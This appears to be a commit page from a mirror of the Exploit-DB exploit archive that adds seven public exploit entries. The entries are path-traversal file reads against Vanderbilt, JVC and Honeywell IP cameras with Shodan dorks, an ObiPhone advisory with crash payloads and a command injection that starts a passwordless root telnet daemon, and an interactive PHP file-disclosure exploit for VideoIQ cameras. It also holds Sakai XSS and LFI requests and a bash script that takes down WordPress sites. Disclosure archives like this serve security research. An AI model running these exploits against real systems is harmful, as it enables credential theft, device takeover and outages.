bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-08-23

Browse source 
7 new exploits

Too many to list!
This commit is contained in:
Offensive Security 2016-08-23 05:06:48 +00:00
parent a1d85642d6
commit 0be2139745
8 changed files with 2202 additions and 1576 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3159
files.csv
View file

File diff suppressed because it is too large Load diff

41
platforms/cgi/webapps/40281.txt Executable file
View file

@ -0,0 +1,41 @@
1. Advisory Information
========================================
Title : Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) Local File Inclusion
Vendor Homepage : https://is.spiap.com/
Remotely Exploitable : Yes
Tested on Camera types : CCPW3025-IR , CVMW3025-IR
Product References : https://is.spiap.com/products/video/1_cameras/11_ip_camerars/bullet-kameror/v54561-c117-a100.html
+ : https://uk.spiap.com/products/video/1_cameras/11_ip_camerars/114_vandal_resistent_dome_cameras/cvmw3025-ir.html
Vulnerability : Local File Inclusion (Critical/High)
Shodan Dork : title:"Vanderbilt IP-Camera"
Date : 20/08/2016
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman.
3. Description
========================================
Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) allows to unauthenticated user to include files from local server such as /etc/passwd, /etc/shadow or config.ini which contains all credentials and other configurations.
4. Proof-of-Concept:
========================================
For example you can get /etc/passwd
http://host:port/cgi-bin/check.cgi?file=../../../etc/passwd
http://host:port/cgi-bin/chklogin.cgi?file=../../../etc/passwd
Or config.ini file:
http://host:port/cgi-bin/check.cgi?file=config.ini
http://host:port/cgi-bin/chklogin.cgi?file=config.ini
5. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.

35
platforms/cgi/webapps/40282.txt Executable file
View file

@ -0,0 +1,35 @@
1. Advisory Information
========================================
Title : JVC IP-Camera (VN-T216VPRU) Local File Inclusion
Vendor Homepage : http://pro.jvc.com/
Remotely Exploitable : Yes
Tested on Camera types : VN-T216VPRU
Product References : http://pro.jvc.com/prof/attributes/features.jsp?model_id=MDL102145
Vulnerability : Local File Inclusion (Critical/High)
Date : 20/08/2016
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman.
3. Description
========================================
JVC IP-Camera (VN-T216VPRU) allows to unauthenticated user to include files from local server such as /etc/passwd, /etc/shadow or config.ini which contains all credentials and other configurations.
4. Proof-of-Concept:
========================================
For example you can get /etc/passwd
http://host:port/cgi-bin/check.cgi?file=../../../etc/passwd
Or config.ini file:
http://host:port/cgi-bin/check.cgi?file=config.ini
5. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.

35
platforms/cgi/webapps/40283.txt Executable file
View file

@ -0,0 +1,35 @@
1. Advisory Information
========================================
Title : Honeywell IP-Camera (HICC-1100PT) Local File Inclusion
Vendor Homepage : https://www.asia.security.honeywell.com
Remotely Exploitable : Yes
Tested on Camera types : HICC-1100PT
Reference : https://www.asia.security.honeywell.com/Pages/product.aspx?category=720P-1.3M%20Box%20Camera&cat=HSG-ASIASECURITY&pid=HICC-1100T
Vulnerability : Local File Inclusion (Critical/High)
Shodan Dork : html:"Honeywell IP-Camera"
Date : 20/08/2016
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman.
3. Description
========================================
Honeywell IP-Camera (HICC-1100PT) allows to unauthenticated user to include files from local server such as /etc/passwd, /etc/shadow or config.ini which contains all credentials and other configurations.
4. Proof-of-Concept:
========================================
For example you can get /etc/passwd
http://host:port/cgi-bin/check.cgi?file=../../../etc/passwd
Or config.ini file:
http://host:port/cgi-bin/check.cgi?file=config.ini
5. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.

268
platforms/hardware/dos/40289.txt Executable file
View file

@ -0,0 +1,268 @@
ObiHai ObiPhone - Multiple Vulnerabilities
------------------------------------------
Introduction
============
Multiple vulnerabilities were discovered in the web management
interface of the ObiHai ObiPhone products. The Vulnerabilities were
discovered during a black box security assessment and therefore the
vulnerability list should not be considered exhaustive.
Affected Devices and Versions
=============================
ObiPhone 1032/1062 with firmware less than 5-0-0-3497.
Vulnerability Overview
======================
Obi-1. Memory corruption leading to free() of an attacker-controlled address
Obi-2. Command injection in WiFi Config
Obi-3. Denial of Service due to buffer overflow
Obi-4. Buffer overflow in internal socket handler
Obi-5. Cross-site request forgery
Obi-6. Failure to implement RFC 2617 correctly
Obi-7. Invalid pointer dereference due to invalid header
Obi-8. Null pointer dereference due to malicious URL
Obi-9. Denial of service due to invalid content-length
Vulnerability Details
=====================
----------------------------------------------------------------------------
Obi-1. Memory corruption leading to free() of an attacker-controlled address
----------------------------------------------------------------------------
By providing a long URI (longer than 256 bytes) not containing a slash in a
request, a pointer is overwritten which is later passed to free(). By
controlling the location of the pointer, this would allow an attacker to affect
control flow and gain control of the application. Note that the free() seems to
occur during cleanup of the request, as a 404 is returned to the user before the
segmentation fault.
python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80
(gdb) bt
#0 0x479d8b18 in free () from root/lib/libc.so.6
#1 0x00135f20 in ?? ()
(gdb) x/5i $pc
=> 0x479d8b18 <free+48>: ldr r3, [r0, #-4]
0x479d8b1c <free+52>: sub r5, r0, #8
0x479d8b20 <free+56>: tst r3, #2
0x479d8b24 <free+60>: bne 0x479d8bec <free+260>
0x479d8b28 <free+64>: tst r3, #4
(gdb) i r r0
r0 0x41 65
---------------------------------------
Obi-2. Command injection in WiFi Config
---------------------------------------
An authenticated user (including the lower-privileged "user" user) can enter a
hidden network name similar to "$(/usr/sbin/telnetd &)", which starts the telnet
daemon.
GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1
Host: foo
Authorization: [omitted]
Note that telnetd is now running and accessible via user "root" with no
password.
-----------------------------------------------
Obi-3. Denial of Service due to buffer overflow
-----------------------------------------------
By providing a long URI (longer than 256 bytes) beginning with a slash, memory
is overwritten beyond the end of mapped memory, leading to a crash. Though no
exploitable behavior was observed, it is believed that memory containing
information relevant to the request or control flow is likely overwritten in the
process. strcpy() appears to write past the end of the stack for the current
thread, but it does not appear that there are saved link registers on the stack
for the devices under test.
python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80
(gdb) bt
#0 0x479dc440 in strcpy () from root/lib/libc.so.6
#1 0x001361c0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) x/5i $pc
=> 0x479dc440 <strcpy+16>: strb r3, [r1, r2]
0x479dc444 <strcpy+20>: bne 0x479dc438 <strcpy+8>
0x479dc448 <strcpy+24>: bx lr
0x479dc44c <strcspn>: push {r4, r5, r6, lr}
0x479dc450 <strcspn+4>: ldrb r3, [r0]
(gdb) i r r1 r2
r1 0xb434df01 3023363841
r2 0xff 255
(gdb) p/x $r1+$r2
$1 = 0xb434e000
-------------------------------------------------
Obi-4. Buffer overflow in internal socket handler
-------------------------------------------------
Commands to be executed by realtime backend process `obid` are sent
via Unix domain sockets from obiapp.
In formatting the message for the Unix socket, a new string is constructed on
the stack. This string can overflow the static buffer, leading to control of
program flow. The only vectors leading to this code that were discovered during
the assessment were authenticated, however unauthenticated code paths may exist.
Note that the example command can be executed as the lower-privileged "user"
user.
GET /wifi?checkssid=[A*1024] HTTP/1.1
Host: foo
Authorization: [omitted]
(gdb)
#0 0x41414140 in ?? ()
#1 0x0006dc78 in ?? ()
---------------------------------
Obi-5. Cross-site request forgery
---------------------------------
All portions of the web interface appear to lack any protection against
Cross-Site Request Forgery. Combined with the command injection vector in
ObiPhone-3, this would allow a remote attacker to execute arbitrary shell
commands on the phone, provided the current browser session was logged-in to the
phone.
----------------------------------------------
Obi-6. Failure to implement RFC 2617 correctly
----------------------------------------------
RFC 2617 specifies HTTP digest authentication, but is not correctly implemented
on the ObiPhone. The HTTP digest authentication fails to comply in the
following ways:
- The URI is not validated
- The application does not verify that the nonce received is the one it sent
- The application does not verify that the nc value does not repeat or go
backwards
GET / HTTP/1.1
Host: foo
Authorization: Digest username="admin", realm="a", nonce="a", uri="/",
algorithm=MD5, response="309091eb609a937358a848ff817b231c",
opaque="", qop=auth,
nc=00000001, cnonce="a"
Connection: close
HTTP/1.1 200 OK
Server: OBi110
Cache-Control:must-revalidate, no-store, no-cache
Content-Type: text/html
Content-Length: 1108
Connection: close
Please note that the realm, nonce, cnonce, and nc values have all been chosen
and the response generated offline.
--------------------------------------------------------
Obi-7. Invalid pointer dereference due to invalid header
--------------------------------------------------------
Sending an invalid HTTP Authorization header, such as
"Authorization: foo", causes the program to attempt to read from an invalid
memory address, leading to a segmentation fault and reboot of the device. This
requires no authentication, only access to the network to which the device is
connected.
GET / HTTP/1.1
Host: foo
Authorization: foo
This causes the server to dereference the address 0xFFFFFFFF, presumably
returned as a -1 error code.
(gdb) bt
#0 0x479dc438 in strcpy () from root/lib/libc.so.6
#1 0x00134ae0 in ?? ()
(gdb) x/5i $pc
=> 0x479dc438 <strcpy+8>: ldrb r3, [r1, #1]!
0x479dc43c <strcpy+12>: cmp r3, #0
0x479dc440 <strcpy+16>: strb r3, [r1, r2]
0x479dc444 <strcpy+20>: bne 0x479dc438 <strcpy+8>
0x479dc448 <strcpy+24>: bx lr
(gdb) i r r1
r1 0xffffffff 4294967295
----------------------------------------------------
Obi-8. Null pointer dereference due to malicious URL
----------------------------------------------------
If the /obihai-xml handler is requested without any trailing slash or component,
this leads to a null pointer dereference, crash, and subsequent reboot of the
phone. This requires no authentication, only access to the network to which the
device is connected.
GET /obihai-xml HTTP/1.1
Host: foo
(gdb) bt
#0 0x479dc7f4 in strlen () from root/lib/libc.so.6
Backtrace stopped: Cannot access memory at address 0x8f6
(gdb) info frame
Stack level 0, frame at 0xbef1aa50:
pc = 0x479dc7f4 in strlen; saved pc = 0x171830
Outermost frame: Cannot access memory at address 0x8f6
Arglist at 0xbef1aa50, args:
Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50
(gdb) x/5i $pc
=> 0x479dc7f4 <strlen+4>: ldr r2, [r1], #4
0x479dc7f8 <strlen+8>: ands r3, r0, #3
0x479dc7fc <strlen+12>: rsb r0, r3, #0
0x479dc800 <strlen+16>: beq 0x479dc818 <strlen+40>
0x479dc804 <strlen+20>: orr r2, r2, #255 ; 0xff
(gdb) i r r1
r1 0x0 0
------------------------------------------------------
Obi-9. Denial of service due to invalid content-length
------------------------------------------------------
Content-Length headers of -1, -2, or -3 result in a crash and device reboot.
This does not appear exploitable to gain execution. Larger (more negative)
values return a page stating "Firmware Update Failed" though it does not appear
any attempt to update the firmware with the posted data occurred.
POST / HTTP/1.1
Host: foo
Content-Length: -1
Foo
This appears to write a constant value of 0 to an address controlled by the
Content-Length parameter, but since it appears to be relative to a freshly
mapped page of memory (perhaps via mmap() or malloc()), it does not appear this
can be used to gain control of the application.
(gdb) bt
#0 0x00138250 in HTTPD_msg_proc ()
#1 0x00070138 in ?? ()
(gdb) x/5i $pc
=> 0x138250 <HTTPD_msg_proc+396>: strb r1, [r3, r2]
0x138254 <HTTPD_msg_proc+400>: ldr r1, [r4, #24]
0x138258 <HTTPD_msg_proc+404>: ldr r0, [r4, #88] ; 0x58
0x13825c <HTTPD_msg_proc+408>: bl 0x135a98
0x138260 <HTTPD_msg_proc+412>: ldr r0, [r4, #88] ; 0x58
(gdb) i r r3 r2
r3 0xafcc7000 2949410816
r2 0xffffffff 4294967295
Mitigation
==========
Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer.
Author
======
The issues were discovered by David Tomaschik of the Google Security Team.
Timeline
========
- 2016/05/12 - Reported to ObiHai
- 2016/05/12 - Findings Acknowledged by ObiHai
- 2016/05/20 - ObiHai reports working on patches for most issues
- 2016/06/?? - New Firmware posted to ObiHai Website
- 2016/08/18 - Public Disclosure

63
platforms/hardware/webapps/40284.txt Executable file
View file

@ -0,0 +1,63 @@
<?php
# VideoIQ Camera Remote File Disclosure 0day Exploit
#
# VideoIQ develops intelligent video surveillance cameras using edge video IP security cameras paired with video analytics.
#
# Exploit Coded & Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# Date 20/08/2016
# Shodan Dork : title:"VideoIQ Camera Login"
# Version Affected : All Versions
# Vendor Homepage : http://avigilon.com
# CVE : N/A
# Description : VideoIQ is vulnerable to remote file disclosure which allows to any unauthenticated user read any file system including file configurations.
###
# Exploit code:
error_reporting(0);
$error[0] = "[!] This script is intended to be launched from the cli.";
if(php_sapi_name() <> "cli")
die($error[0]);
if($argc < 3) {
echo("\nUsage : php {$argv[0]} <host> <port>");
echo("\nExample: php {$argv[0]} localhost 8080");
die();
}
if(isset($argv[1]) && isset($argv[2])) {
$host = $argv[1];
$port = $argv[2];
}
$pack = "GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C..{FILE_PATH} HTTP/1.0\r\n";
$pack.= "Host: {$host}\r\n";
$pack.= "Connection: close\r\n\r\n";
while(1) {
if(strstr(http_send($host, $port, preg_replace("/{FILE_PATH}/", '/etc/passwd', $pack)), 'root')) {
echo("\nAnonymous@{$host}:~# cat ");
if(($file = trim(fgets(STDIN))) == "exit")
break;
$ret = http_send($host, $port, preg_replace("/{FILE_PATH}/", $file, $pack));
if(strstr($ret, '<title>Error 404 NOT_FOUND</title>') || strstr($ret, '<p>Problem accessing') || strstr($ret, '<h2>HTTP ERROR 404</h2>')) {
echo("cat: {$file}: No such file or directory");
} else {
echo($ret);
}
} else {
echo("[-] Server likely not vulnerable.\n");
break;
}
}
function http_send($host, $port, $pack) {
if(!($sock = fsockopen($host, $port)))
die("\n[-] No response from {$host}\n");
fwrite($sock, $pack);
$response = explode("\r\n\r\n", stream_get_contents($sock));
return($response[1]);
}
?>

107
platforms/java/webapps/40286.txt Executable file
View file

@ -0,0 +1,107 @@
Sakai 10.7 Multiple Vulnerabilities
Vendor: Apereo Foundation
Product web page: https://www.sakaiproject.org
Affected version: 10.7 (Kernel 10.7)
Summary: Sakai is a free, community source, educational software
platform designed to support teaching, research and collaboration.
Systems of this type are also known as Course Management Systems (CMS),
Learning Management Systems (LMS), or Virtual Learning Environments (VLE).
Desc: Sakai suffers from multiple reflected cross-site scripting vulnerabilities
when input passed via several parameters to several scripts is not properly
sanitized before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an
affected site. Also there is a file disclosure vulnerability when calling
custom tool script. It is not properly verified before being used to read files.
This can be exploited to disclose contents of files from local resources.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5358
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5358.php
Vendor: https://jira.sakaiproject.org/browse/SAK-26334 (XSS file upload filename param)
https://jira.sakaiproject.org/browse/SAK-31523 (XSS when creating job)
https://jira.sakaiproject.org/browse/SAK-31524 (XSS in URI)
https://jira.sakaiproject.org/browse/SAK-31525 (LFI when calling tools)
29.06.2016
--
XSS when using file upload (filename parameter):
------------------------------------------------
POST /sakai-fck-connector/web/editor/filemanager/browser/default/connectors/jsp/connector/user/admin/?Command=FileUpload&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioAdmin%2F HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryViazQNB5ok9E64l2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://localhost:8080/library/editor/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
------WebKitFormBoundaryViazQNB5ok9E64l2
Content-Disposition: form-data; name="NewFile"; filename="test.jsp'-alert(1)-'foo"
Content-Type: application/octet-stream
testingus
------WebKitFormBoundaryViazQNB5ok9E64l2--
Response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=EmulateIE11
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 383
Date: Wed, 29 Jun 2016 11:45:49 GMT
Connection: close
<script type="text/javascript">
(function(){ var d = document.domain ; while ( true ) {
try { var test = parent.document.domain ; break ; } catch( e ) {}
d = d.replace( /.*?(?:\.|$)/, '' ) ; if ( d.length == 0 ) break ;
try { document.domain = d ; } catch (e) { break ; }}})() ;
window.parent.OnUploadCompleted(201,'','test.jsp'-alert(1)-'foo','');
</script>
XSS when creating a job (After creating a job, click on "Triggers" link):
-------------------------------------------------------------------------
GET /portal/tool/~admin-1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A_id10=Data+Warehouse+Update&_id2:_id14=Post&com.sun.faces.VIEW=&_id2=_id2 HTTP/1.1
Host: localhost:8080
XSS in URI:
-----------
GET /access/basiclti/site/~admin/axxm4j<img src=a onerror=alert(3)> HTTP/1.1
Host: localhost:8080
LFI when calling custom tool (Affects Apache Wicket tools like Profile2 and Statistics.
Adding "../" is not needed to reproduce the issue. It can be reproduced just by visiting:
/portal/tool/[TOOL_ID]/WEB-INF/web.xml):
----------------------------------------
GET /portal/tool/41fec34b-a47c-4aa5-8786-3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB-INF/web.xml HTTP/1.1
Host: localhost:8080

70
platforms/php/webapps/40288.txt Executable file
View file

@ -0,0 +1,70 @@
Path traversal vulnerability in WordPress Core Ajax handlers
Abstract
A path traversal vulnerability was found in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160712-0036
See also
- CVE-2016-6896
- CVE-2016-6897
- #37490 - Improve capability checks in wp_ajax_update_plugin() and wp_ajax_delete_plugin()
Tested versions
This issue was successfully tested on the WordPress version 4.5.3.
Fix
WordPress version 4.6 mitigates this vulnerability by moving the CSRF check to the top of the affected method(s).
Introduction
WordPress is web software that can be used to create a website, blog, or app. A path traversal vulnerability exists in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site.
Details
The path traversal vulnerability exists in the file ajax-actions.php, in particular in the function wp_ajax_update_plugin().
The function first tries to retrieve some version information from the target plugin. After this is done, it checks the user's privileges and it will verify the nonce (to prevent Cross-Site Request Forgery). The code that retrieves the version information from the plugin is vulnerable to path traversal. Since the security checks are done at a later stage, the affected code is reachable by any logged on user, including Subscribers.
Potentially this issue can be used to disclose information, provided that the target file contains a line with Version:. What is more important that it also allows for a denial of service condition as the logged in attacker can use this flaw to read up to 8 KB of data from /dev/random. Doing this repeatedly will deplete the entropy pool, which causes /dev/random to block; blocking the PHP scripts. Using a very simple script, it is possible for an authenticated user (Subscriber) to bring down a WordPress site. It is also possible to trigger this issue via Cross-Site Request Forgery as the nonce check is done too late in this case.
Proof of concept
The following Bash script can be used to trigger the denial of service condition.
#!/bin/bash
target="http://<target>"
username="subscriber"
password="password"
cookiejar=$(mktemp)
# login
curl --cookie-jar "$cookiejar" \
--data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \
"$target/wp-login.php" \
>/dev/null 2>&1
# exhaust apache
for i in `seq 1 1000`
do
curl --cookie "$cookiejar" \
--data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \
"$target/wp-admin/admin-ajax.php" \
>/dev/null 2>&1 &
done
rm "$cookiejar"